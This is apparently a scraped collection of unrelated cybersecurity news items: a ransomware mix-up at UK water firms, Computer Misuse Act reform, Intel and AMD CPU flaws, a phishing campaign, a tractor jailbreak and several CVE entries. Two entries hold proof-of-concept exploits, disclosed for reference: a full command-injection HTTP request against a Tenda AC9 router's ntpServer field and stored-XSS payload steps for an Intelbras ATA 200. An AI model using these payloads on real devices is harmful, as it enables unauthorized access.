South Staffordshire in the UK has acknowledged it was targeted in a cyberattack, but Clop ransomware appears to be shaking down the wrong water company.

South Staffordshire plc, a UK water-supply company, has acknowledged it was the victim of a cyberattack. Around the same time, the Clop ransomware group started threatening Thames Water that it would release data it has stolen from the utility unless Thames Water paid up.

The problem? Thames Water wasn't breached. 

Apparently, Clop got its UK water companies confused. 

South Staffordshire serves about 1.6 million customers and recently reported that it was targeted in a cyberattack and was "experiencing a disruption to out corporate IT network and our teams are working to resolve this as quickly as possible." It added there has been no disruption on service. 

"This incident has not affected our ability to supply safe water, and we can confirm we are still supplying safe water to all of our Cambridge Water and South Staffs Water customers," the water company said. 

Meanwhile, Thames Water, the UK's largest water supplier to more than 15 million people, was forced to deny it was breached by Clop ransomware attackers, who threatened they now had the ability to tamper with the water supply, according to reports. 

"As providers of critical national infrastructure, we take the security of our networks and systems very seriously and are focused on protecting them, so that we can continue to provide resilient services to our customers and the environment,” the larger water company told the UK Mirror. 

While Clop seems to have its records all wrong, both water utilities mounted capable responses to the ransomware group's attack on critical infrastructure, according to Edward Liebig, global director of cyber ecosystem at Hexagon Asset Lifecycle Intelligence. 

"I’m impressed by South Staffordshire Water’s ability to defend against the cyberattack in the IT systems and buffer the OT systems from impact," Liebig said. "And had Thames Water not done an investigation of the 'proof of compromise,' they may very well have decided to negotiate further. In both instances, each organization did their due diligence."

Clop Ransomware Gang Breaches Water Utility, Just Not the Right One

Contentious edge case activities are no excuse for further delaying of ‘much overdue’ reform, say campaigners

Contentious edge case activities are no excuse for further delaying of ‘much overdue’ reform, say campaigners

Campaigners for reform of the UK’s Computer Misuse Act (CMA) have identified cybersecurity activities that should be legally defensible amid an ongoing government review of the 1990 law.

Based on the “consensus” view of experts, these legitimate hacking activities included responsible vulnerability research and disclosure, proportionate threat intelligence, best practice internet scanning, enumeration, use of open directory listings, and honeypots.

This consensus “would form the core basis of a new legal environment for cybersecurity professionals based on a statutory defence,” says a report (PDF) published yesterday (August 15) by the CyberUp campaign.

RELATED Statutory defense for ethical hacking under UK Computer Misuse Act tabled

Far from unleashing “a wild west of cyber vigilantism”, such a defense “will enable the UK’s cybersecurity sector to more effectively protect the UK as part of the whole-of-society effort, whilst ensuring cybercriminals can still be prosecuted”.

**Edge cases**

The CyberUp campaign also set out actions that should broadly be considered illegitimate, such as so-called ‘hack backs’ and malware deployment, as well as ‘active defence’ techniques that “still represent a grey area”.

These “contentious edge cases”, which require “further consultation and discussion as the policy formation process develops”, include exploitation of vulnerabilities, verification of passive-detected vulnerabilities, infiltrating a bad actor’s network, credential stuffing, active intel gathering, forensic analysis, botnets, and neutralizing suspicious or nefarious assets.

CyberUp insisted that the existence of edge cases is no excuse for further delaying of “much overdue” reform.

Campaigners deliver a letter signed by MPs that called for CMA reform to the Prime Minister’s residence

The results were based on input from 15 cybersecurity researchers, consultants, and other experts who assessed activities according to the potential harms and benefits accrued.

The degree of ‘consensus’, whereby more than 50% of experts agreed, varied considerably.

For instance, 100% agreed that use of sandboxes caused no or limited harm but delivered clear benefits, whereas 64% agreed that patching third-party networks or using remote desktop protocol (RDP) connections to obtain information from an attacker’s computers potentially ran the risk of causing harm but also provided worthwhile benefits.

**Importance of intent**

“Unsurprisingly, the exercise also revealed the limitations of any effort to isolate techniques, activities, and actions from the intent of an actor”, where the CMA currently “falls short”, said the report.

Rather than relying on binary lists of legitimate and illegitimate activities, which would quickly become out of date as techniques and technology evolved, CyberUp recommends that courts use broad principles to judge instances of unauthorised access.

A defense framework (PDF) published in 2021 by CyberUp establishes a set of such principles.

Read more of the latest cybersecurity news from the UK

The CyberUp campaign said it disagreed with suggestions from certain experts it consulted that some activities should only be conducted under license or, more stringently still, where actors “have been certified and have a court warrant to proceed”.

“Our view is that, over time with case law, and ideally with clear guidance from prosecutors, the boundaries of legal conduct will be sufficiently unambiguous to counter the need for the high degree of oversight that is sought by those who prefer a system more tightly regulated by the courts,” said the report.

A review of the aging CMA, which criminalizes “unauthorized access”, was announced in May 2021.

RECOMMENDED Browser-powered desync: New class of HTTP request smuggling attacks showcased at Black Hat USA

Legitimate hacking activities under UK law proposed by ‘expert consensus’

A group of researchers has revealed details of a new vulnerability affecting Intel CPUs that enables attackers to obtain encryption keys and other secret information from the processors.
Dubbed ÆPIC Leak, the weakness is the first-of-its-kind to architecturally disclose sensitive data in a manner that's akin to an "uninitialized memory read in the CPU itself."
"In contrast to transient execution

A group of researchers has revealed details of a new vulnerability affecting Intel CPUs that enables attackers to obtain encryption keys and other secret information from the processors.

Dubbed ÆPIC Leak, the weakness is the first-of-its-kind to architecturally disclose sensitive data in a manner that's akin to an "uninitialized memory read in the CPU itself."

"In contrast to transient execution attacks like Meltdown and Spectre, ÆPIC Leak is an architectural bug: the sensitive data gets directly disclosed without relying on any (noisy) side channel," the academics said.

The study was conducted by researchers from the Sapienza University of Rome, the Graz University of Technology, Amazon Web Services, and the CISPA Helmholtz Center for Information Security.

The vulnerability (CVE-2022-21233, CVSS score: 6.0), which affects CPUs with Sunny Cover microarchitecture, is rooted in a component called Advanced Programmable Interrupt Controller (APIC), which provides a mechanism to handle and route hardware interrupt signals in a scalable manner.

"The scan of the I/O address space on Intel CPUs based on the Sunny Cove microarchitecture revealed that the memory-mapped registers of the local Advanced Programmable Interrupt Controller (APIC) are not properly initialized," the researchers noted.

"As a result, architecturally reading these registers returns stale data from the microarchitecture. Any data transferred between the L2 and the last-level cache can be read via these registers."

ÆPIC Leak specifically targets systems using Intel's trusted execution environment (TEE) known as Software Guard eXtensions (SGX), causing the leakage of AES and RSA keys from secure enclaves that run on the same physical CPU core with a success rate of 94% and 74% respectively.

"By protecting selected code and data from modification, developers can partition their application into hardened enclaves or trusted execution modules to help increase application security," Intel explains about the security assurances offered by SGX.

The flaw, put simply, breaks the aforementioned guarantees, enabling an attacker with permissions to execute privileged native code on a target machine to extract the private keys, and worse defeat attestation, a cornerstone of the security primitives used in SGX to ensure the integrity of code and data.

In response to the findings, Intel has released firmware updates, while describing the issue as a medium-severity vulnerability related to improper isolation of shared resources, leading to information disclosure via local access.

It's also worth noting that Intel has since deprecated support for SGX for its client CPUs, what with a litany of attack methods plaguing the technology, including SGX-ROP, MicroScope, Plundervolt, Load Value Injection, SGAxe, and VoltPillager.

**SQUIP Side Channel Attack Affect AMD CPUs**

The development comes as researchers demonstrated what's the first-ever side channel attack (CVE-2021-46778) on scheduler queues impacting AMD Zen 1, Zen 2, and Zen 3 microarchitectures that could be abused by an adversary to recover RSA keys.

The attack, codenamed SQUIP (short for Scheduler Queue Usage via Interference Probing), entails measuring the contention level on scheduler queues to potentially glean sensitive information.

No security updates have been released to patch the line of attack, but the chipmaker has recommended that "software developers employ existing best practices, including constant-time algorithms and avoiding secret-dependent control flows where appropriate."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

ÆPIC and SQUIP Vulnerabilities Found in Intel and AMD Processors

Heads of CIA and CISA headline event at DC Convention Center.

Returning in person after two years, the 13th Annual Billington Cybersecurity Summit is a three-day event designed to examine the nation's pressing cyber needs and the impact of the Biden Administration's fast-moving cyber strategic direction.

The summit explores "Transforming Cybersecurity Through a Unified Approach" with a focus on the hottest cyber topics. More than 125 speakers spanning government, military, nonprofits, industry, and academia, including CIA Director William Burns; Chris Inglis, National Cyber Director, EOP; DHS CISA Director Jen Easterly; John Sherman, CIO, DOD; and two top cyber officials from Ukraine will discuss cyber trends and issues during more than 40 sessions.

**WHEN**

September 7-9, 2022

Sept 7: 8:45 a.m.-5 p.m.

Sept 8: 8:30 a.m.-5 p.m.

Sept 9: 9 a.m.-noon

**TOPICS**

The summit has more than 40 panel discussions, breakout sessions, and fireside chats. Agenda topics include:

*   Cyber Lessons Learned from Ukraine
*   Securing Infrastructure in an Increasingly Connected World
*   Election Security and the 2022 National Elections
*   Lessons Learned for Fortifying a Strong Cybersecurity Workforce
*   All-Star VC Roundtable: What Are the Next Game-Changing Cyber, Disruptive Technologies?
*   The Cyber Threat Landscape and Zero Trust: Lessons Learned and Success Stories
*   Future of Encryption: Moving to a Quantum-Resistant World
*   Cybersecurity Public/Private Engagement
*   Addressing Insider Threat while Protecting Privacy
*   Future Panel | Cybersecurity and the Future of 5G
*   Enhancing the Security of Open-Source Software and the Supply Chain
*   Automating Cybersecurity: Applying AI Internally and at the Edge
*   Beyond Ransomware: Identifying the Next Cyber Threats

**WHERE**

Walter E. Washington Convention Center

801 Mt Vernon Pl NW

Washington, DC

**HOW**

Learn more or register at https://billingtoncybersummit.com/. Complimentary government and military tickets are available. Tickets for corporate attendees are $895; academic and non-profits are $125; and students are $25. Press is free for credentialed reporters but must register in advance online.

**WHY**

Presented by over 40 sponsors, led by Amazon Web Services, Raytheon Intelligence & Space, and Cisco Secure, the Billington Summit convenes leading senior cyber government decision-makers to examine key trends and topics while fostering deeper dialogue between government leaders and private industry.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

SEPT. 7-9: Ukraine, Election, AI, Cybercrime, 5G Among Topics Explored by 125+ Speakers at 13th Billington Cybersecurity Summit

upsMonitor in ViewPower (aka ViewPowerHTML) 1.04-21012 through 1.04-21353 has insecure permissions for the service binary that enable an Authenticated User to modify files, allowing for privilege escalation.

 ViewPower Management Software 

**ViewPowerHTML 1.04-21353** is an advanced UPS management software. It allows remote monitor and manage from one to multiple UPSs in a networked environment, either LAN or INTERNET. It can not only prevent data loss from power outage and safely shutdown systems, but also store programming data and scheduled shutdown UPSs.  

  

**Feature summary:**  
• Allows control and monitoring of multiple UPSs via LAN and INTERNET  
• Supports auto and manual online upgrade  
• User-friendly power analysis graph: event statistics, history data chart export  
• Real-time dynamic graphs of UPS data (voltage, frequency, load level, battery level)  
• Safely OS shutdown and protection from data loss during power failure  
• Warning notifications via audible alarm, broadcast, mobile messenger, and e-mail  
• Scheduled UPS on/off, battery test, programmable outlet control, and audible alarm control  
• Password security protection and remote access management  
• Supports multiple languages: English, Chinese, French, German, Spanish, Russian, Portuguese, Ukrainian, Italian, Polish, Czech, Turkish   Download the software according to your requested operation system in your computer system. Supported browser versions include IE browser (not support the version older than IE10), Google, Chrome, Firefox,. All browers should support html5.

Software Version

Type

Download Link

Supported OS

ViewPower Network Edition  

Software for Windows® (V.HTML 1.04-21353)

Windows® 7 / 8 / 10 (32-bit & x64-bit) / 11  
Windows® Server 2012 / 2016 / Windows SBS 2011

Windows XP 2003 /2008

Windows® Server 2019 (32-bit & x64-bit)

User Manual

Windows® 7 / 8 / 10 (32-bit & x64-bit) / 11  
Windows® Server 2012 / 2016 / 2019 (32-bit & x64-bit) Windows SBS 2011

Software for MAC x86-64 (V.HTML 1.04-21353) Intel Chip

Mac OS 10.6/10.7/10.8/10.9/10.10/10.11/10.12/10.13/10.14/10.15 /11.x (intel x64-bit)

Software for MAC x86-64 (V.HTML 1.04-21353) M1 Chip

Mac OS 11.x (M1)

Software for Linux  
(V.HTML 1.04-21353)

Graphic mode operation:

Linux Cent OS 5/ 6 / 7 (32-bit )  
Linux Debian 6.x/8.x/10.x (32bit)  
Linux Fedora 5/ 17 (32bit)  
Linux Mint 14.x/19.x (32bit)  
Linux OpenSUSE 10/ 11 / 12/ 13 (32bit)  
Linux RedHat Enterprise AS3, AS5 AS6 (32bit)  
Linux RedHat Enterprise 5/8/9 (32-bit)  
Linux Ubuntu 8/ 9/ 10/ 12/ 14/ 15/ 16 (32-bit )  

Text mode operation:

Graphic mode operation:

Linux CentOS 5/ 6/ 7/ 8 (64bit)  
Linux Debian 6/ 7/ 8/ 10 (64bit)  
Linux Fedora 5/ 17/ 33 (64-bit)  
Linux Mint 19/ 20 (64bit)  
Linux OpenSUSE 10/ 11/ 12/ 13 (64bit)  
Linux RedHat Enterprise AS6 (64bit)  
Linux SUSE 10/ 11/ 12 (64bit)  
Linux Ubuntu 10/ 11/ 12/ 14/ 15/ 16/ 18/ 19/ 20 (64bit)  

Text mode operation:

ESXI Shutdown Wizard

User Manual

ESXI 4.x/ 5.x/6.x

CVE-2021-30490: Software download for Uninterruptible Power Supply

Tenda AC9 V15.03.2.21_cn is vulnerable to command injection via goform/SetSysTimeCfg.

The parameter Ntpserver is passed to tip\_sntp\_handle->doSystemCmd. A command injection vulnerability was formed.

    POST /goform/SetSysTimeCfg HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 76
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.9150451753353981&
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=25f9e794323b453885f5181f1b624d0btjotgb
    Connection: close
    
    timePeriod=86400&ntpServer="time.windows.com| ls > /tmp/f0und"&timeZone=20%3A00

CVE-2022-36273: CVEIDs/TendaAC9 at main · F0und-icu/CVEIDs

Microsoft on Monday revealed it took steps to disrupt phishing operations undertaken by a "highly persistent threat actor" whose objectives align closely with Russian state interests.
The company is tracking the espionage-oriented activity cluster under its chemical element-themed moniker SEABORGIUM, which it said overlaps with a hacking group also known as Callisto, COLDRIVER, and TA446.
"

Microsoft on Monday revealed it took steps to disrupt phishing operations undertaken by a "highly persistent threat actor" whose objectives align closely with Russian state interests.

The company is tracking the espionage-oriented activity cluster under its chemical element-themed moniker **SEABORGIUM**, which it said overlaps with a hacking group also known as Callisto, COLDRIVER, and TA446.

"SEABORGIUM intrusions have also been linked to hack-and-leak campaigns, where stolen and leaked data is used to shape narratives in targeted countries," Microsoft's threat hunting teams said. "Its campaigns involve persistent phishing and credential theft campaigns leading to intrusions and data theft."

Attacks launched by the adversarial collective are known to target the same organizations using consistent methodologies applied over long periods of time, enabling it to infiltrate the victims' social networks through a combination of impersonation, rapport building, and phishing.

Microsoft said it observed "only slight deviations in their social engineering approaches and in how they deliver the initial malicious URL to their targets."

Primary targets include defense and intelligence consulting companies, non-governmental organizations (NGOs) and intergovernmental organizations (IGOs), think tanks, and higher education entities located in the U.S. and the U.K., and to a lesser extent in the Baltics, the Nordics, and the Eastern Europe.

Additional targets of interest consist of former intelligence officials, experts in Russian affairs, and Russian citizens abroad. More than 30 organizations and personal accounts are estimated to have been at the receiving end of its campaigns since the start of 2022.

It all starts with a reconnaissance of potential individuals by leveraging fake personas created on social media platforms like LinkedIn, before establishing contact with them via benign email missives originating from newly-registered accounts configured to match the names of the impersonated individuals.

In the event the target falls victim to the social engineering attempt, the threat actor activates the attack sequence by sending a weaponized message embedding a booby-trapped PDF document or a link to a file hosted on OneDrive.

"SEABORGIUM also abuses OneDrive to host PDF files that contain a link to the malicious URL," Microsoft said. "The actors include a OneDrive link in the body of the email that when clicked directs the user to a PDF file hosted within a SEABORGIUM-controlled OneDrive account."

Furthermore, the adversary has been found to disguise its operational infrastructure by resorting to seemingly harmless open redirects to send users to the malicious server, which, in turn, prompts users to enter their credentials to view the content.

The last phase of attacks entails abusing the stolen credentials to access the victim's email accounts, taking advantage of the unauthorized logins to exfiltrate emails and attachments, set up email forwarding rules to ensure sustained data collection and other follow-on activities.

"There have been several cases where SEABORGIUM has been observed using their impersonation accounts to facilitate dialog with specific people of interest and, as a result, were included in conversations, sometimes unwittingly, involving multiple parties," Redmond pointed out.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Warns About Phishing Attacks by Russia-linked Hackers

By Waqas
The hacker “Sick Codes” managed to jailbreak the display/control unit of one of the John Deere Tractor models…
This is a post from HackRead.com Read the original post: White Hat Hacker at DefCon Jaikbreaks Tractor to Play Doom

****The hacker “Sick Codes” managed to jailbreak the display/control unit of one of the John Deere Tractor models during DefCon hacking conference.****

On August 14th, 2022 at the **DEFCON** hacking conference, a white hat hacker and infosec researcher going by the online handle of “Sick Codes” demonstrated how the display/control unit of John Deere Tractor can be compromised to take control of a targeted tractor model.

In the researcher’s case, they shared a live video of the popular Doom game being played on the Tractor’s display screen.

“I launched the attack and two minutes later a terminal pops up,” **Sick Codes** said. “I had root access, which is rare in Deere land.”

Sick Codes on Twitter

It is worth noting that the process requires physical access to the tractor’s circuit board to execute the attack. However, according to the researcher, based on the existing vulnerabilities, it would be possible to develop a tool “to easily execute the jailbreak.”

Since the release of the video, the cyber security community is expressing grave concerns about the possibility of exploitation and possible cyber attacks against farm equipment manufacturer John Deere giant and its customers.

> On Saturday, I sat in a crowded ballroom at Caesar's Forum in Vegas and watched @sickcodes jailbreak a John Deere tractor's control unit live, before an audience of cheering @Defcon 30 attendees (and, possibly, a few undercover Deere execs, who often attend Sickcodes's talks). 1/ pic.twitter.com/WHuMCFQLZy
> 
> — Cory Doctorow (@doctorow) August 15, 2022

On Twitter, the co-founder, and CEO of the online repair community iFixit and “Right to repair” advocate Kyle Wiens said that “This is just the beginning. Turns out our entire food system is built on outdated, unpatched Linux and Windows CE hardware with LTE modems.”

> Sick Codes has jailbroken a John Deere, and this is just the beginning. Turns out our entire food system is built on outdated, unpatched Linux and Windows CE hardware with LTE modems. pic.twitter.com/OLDBckluxr
> 
> — Kyle Wiens (@kwiens) August 14, 2022

Wiens **went on** to raise his voice in favor of the ongoing right-to-repair movement stating that “John Deere has repeatedly told regulators that farmers can’t be trusted to repair their own equipment. This foundational work will pave the path for farmers to retake control of the equipment that they own.”

As for Sick Codes’ stance on the right to repair; the hacker **told** Wired that,

> We want farmers to be able to repair their stuff for when things go wrong, and now that means being able to repair or make decisions about the software in their tractors.”
> 
> Sick Codes

**What is right to repair movement?**

For your information, the **right to repair** is a movement that is gaining traction in the United States. The aim of the right to repair movement is to give consumers the ability to repair their own electronic devices, rather than being forced to go through the manufacturer.

As farmers and ranchers across the United States face mounting pressure to adopt new technology, they are also grappling with another issue: whether they will have the right to repair their own equipment.

At the heart of the debate is John Deere, one of the largest manufacturers of agricultural equipment in the world. The company has been outspoken in its opposition to the “right to repair” legislation, which would give farmers and other owners of Deere equipment the ability to fix it themselves or take it to an independent repair shop.

Deere argues that such legislation would jeopardize its intellectual property and put customers at risk. The company has also said that it already offers a wide range of services and support for farmers who need to repair their equipment.

**Solution**

According to Sick Codes, it will be important to see what Deere may do to patch the vulnerabilities. The researcher added that it might be possible that the issue can be resolved with full disk encryption which sounds like an impossible task with tractors that are already in use. Nevertheless, if taken seriously, Deere can sort things out in its upcoming tractor models.

**Sick Codes with his “Sick” Hacks!**

This is not the first time when Sick Codes has come up with a hack that has made headlines worldwide. In 2021, the hacker demonstrated how malicious elements can exploit a plethora of vulnerabilities in tractors to overspray farms in the United States.

Sick Codes on YouTube in 2021

1.  **Nintendo Switch Hacked to Run Pirated Games**
2.  **Self-driving cars can be fooled by displaying virtual objects**
3.  **Wikileaks Vault 7: CIA hacked Smart TVs, Trucks, and Computers**
4.  **Tesla cars and smart devices can be unlocked due to Bluetooth Flaws**
5.  **Hackers Exploit Tegra Chipset Flaw to Run Linux OS on Nintendo Switch**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

White Hat Hacker at DefCon Jaikbreaks Tractor to Play Doom

Directory Traversal vulnerability ZDBQAREFSUBDIR parameter in /zropusermgmt API in Zoho ManageEngine Analytics Plus before 4350 allows remote attackers to run arbitrary code.

CVE-2020-21642: ManageEngine Analytics Plus | Release Notes

Authenticated stored cross-site scripting (XSS) vulnerability in "Field Server Address" field in INTELBRAS ATA 200 Firmware 74.19.10.21 allows attackers to inject JavaScript code through a crafted payload.

Change Mirror Download

    # Exploit Title: Intelbras ATA 200 Authenticated Stored XSS# Date: 17/01/2022# Exploit Author: Leonardo Goncalves# Vendor Homepage: https://www.intelbras.com/pt-br/adaptador-ip-para-telefones-analogicos-ata-200# Version: Firmware 74.19.10.211) Log in the equipment via your web browser2) Go to Management > Syslog3) In the "Field Server Address" inject the payload "-prompt("XSS")-"4) Click Save5) Exploit

Tag

#intel